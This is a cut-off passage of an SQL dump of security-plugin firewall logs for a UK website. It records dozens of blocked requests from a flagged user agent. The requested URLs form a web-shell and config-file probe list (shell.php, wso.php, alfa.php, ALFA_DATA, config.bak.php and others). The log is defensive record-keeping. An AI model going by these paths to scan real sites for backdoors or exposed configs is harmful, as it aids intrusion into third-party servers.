User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10988,1673883266.056374,1673883265.947200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10989,1673883265.488531,1673883265.370700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10990,1673883264.928422,1673883264.804400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10991,1673883264.372989,1673883264.265900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10992,1673883263.787201,1673883263.673400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10993,1673883263.242581,1673883263.129100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10994,1673883262.688020,1673883262.578600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10995,1673883262.147774,1673883262.023200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10996,1673883261.592235,1673883261.478300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10997,1673883261.045427,1673883260.934500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10998,1673883260.503509,1673883260.391600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10999,1673883259.951341,1673883259.843600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11000,1673883259.386717,1673883259.276900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11001,1673883258.847525,1673883258.738100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11002,1673883258.298415,1673883258.186700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11003,1673883257.756750,1673883257.643400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11004,1673883257.212893,1673883257.101900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11005,1673883256.672381,1673883256.557900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11006,1673883254.334507,1673883254.196300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11007,1673883252.945971,1673883252.823400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11008,1673883251.600867,1673883251.470300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11009,1673883250.232143,1673883250.120500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11010,1673883248.828347,1673883248.720900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11011,1673883247.625912,1673883247.514400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11012,1673883246.296045,1673883246.181500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11013,1673883244.934378,1673883244.822200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11014,1673883243.545168,1673883243.426600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11015,1673883241.988148,1673883241.877700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11016,1673883240.339982,1673883240.228200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11017,1673883239.074394,1673883238.960500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11018,1673883237.508686,1673883237.358200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11019,1673883235.834243,1673883235.719400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11020,1673883234.644438,1673883234.520700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11021,1673883233.230200,1673883233.115100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11022,1673883231.870023,1673883231.761500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11023,1673883230.257755,1673883230.110500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11024,1673883228.524006,1673883228.409100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11025,1673883227.243966,1673883227.128400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11026,1673883225.997199,1673883225.884700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11027,1673883224.663179,1673883224.543500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11028,1673883223.506219,1673883223.293600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11029,1673883217.951275,1673883217.808600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11030,1673883216.702784,1673883216.582900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11031,1673883215.521807,1673883215.402300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11032,1673883214.360916,1673883214.233200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11033,1673883213.188660,1673883213.061500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11034,1673883211.821797,1673883211.711300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11035,1673883210.066103,1673883209.954100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11036,1673883207.541173,1673883207.419300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11037,1673883203.793407,1673883203.678100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11038,1673883202.604231,1673883202.496600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11039,1673883201.467032,1673883201.354000,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11040,1673883198.926080,1673883198.796100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11041,1673883197.687722,1673883197.557600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11042,1673883197.096418,1673883196.974900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 